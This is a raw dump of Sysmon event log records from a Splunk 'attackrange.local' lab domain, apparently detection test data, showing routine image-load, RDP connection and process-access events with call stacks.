AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0B00EE9F3F9DE1BDD599E6510B805CD,SHA256=FBF63C826554F91A2C1496BF61F34CF3F9B411D328602C31166B572FB22CFA4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049911Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:03.206{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2461D2806B0B35F67086AAC98A80F36D,SHA256=E8F571BA9ECBE5E01B5874B7D3ECC0A5E43729E880CEC7D3E5F62A0FBCC3DAE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049910Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:03.206{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=92093596AEBC4A8D2BEC5B9C2707CAD1,SHA256=18D52EBDD552836135544D6DDC83A4F71BFA23D439CA7BBA72AE2E78CECC6565,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808048Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:04.960{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B27AD452DFFCE70AE6446F834F42C28C,SHA256=6581C2ECC380D142804E79E7351B08ACECF31C2AAC36E677B217B75F6607268C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049914Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:04.420{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4083392507F97D51D8918FAFCC832CC7,SHA256=289B2F8DFC57B11633ED3B1308C82EE03F5FB761EB676FA0160E3855F5F377BC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049913Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:55.456{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse195.78.54.188-51646-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001049950Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.936{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4AFEA57EE4DA082C59EC61C0A184B43,SHA256=1544F9EFBE5F27C68699E33FA4C035CCA9C58912A540255E3808765D145C5EC9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049949Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.906{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001049948Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.906{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001049947Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.906{466BC892-32D3-60E8-770B-00000000CF01}63567400C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049946Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.906{466BC892-32D3-60E8-770B-00000000CF01}63567400C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049945Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.873{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\execmodelclient.dll+8e62|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001049944Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.873{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\execmodelclient.dll+8d5e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001049943Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.873{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001049942Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.873{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001049941Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.873{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001049940Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.873{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001049939Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.872{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049938Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.871{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049937Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.851{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049936Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.851{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049935Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.851{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049934Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.851{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049933Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.851{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049932Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.851{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049931Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.851{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049930Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.851{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049929Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.851{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYS